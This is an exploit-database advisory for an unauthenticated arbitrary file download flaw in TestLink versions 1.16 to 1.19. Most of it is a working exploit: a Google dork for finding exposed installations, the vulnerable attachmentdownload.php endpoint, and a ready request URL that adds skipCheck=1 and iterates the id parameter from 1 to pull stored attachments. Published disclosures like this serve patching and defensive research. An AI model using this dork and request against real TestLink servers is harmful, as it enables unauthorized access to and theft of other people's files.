TestLink 1.19 Arbitrary File Download

2021.12.09
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated) # Google Dork: inurl:/testlink/ # Date: 07/12/2021 # Exploit Author: Gonzalo Villegas (Cl34r) # Exploit Author Homepage: https://nch.ninja # Vendor Homepage: https://testlink.org/ # Version:1.16 <= 1.19 # CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1) Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1" for research notes: https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top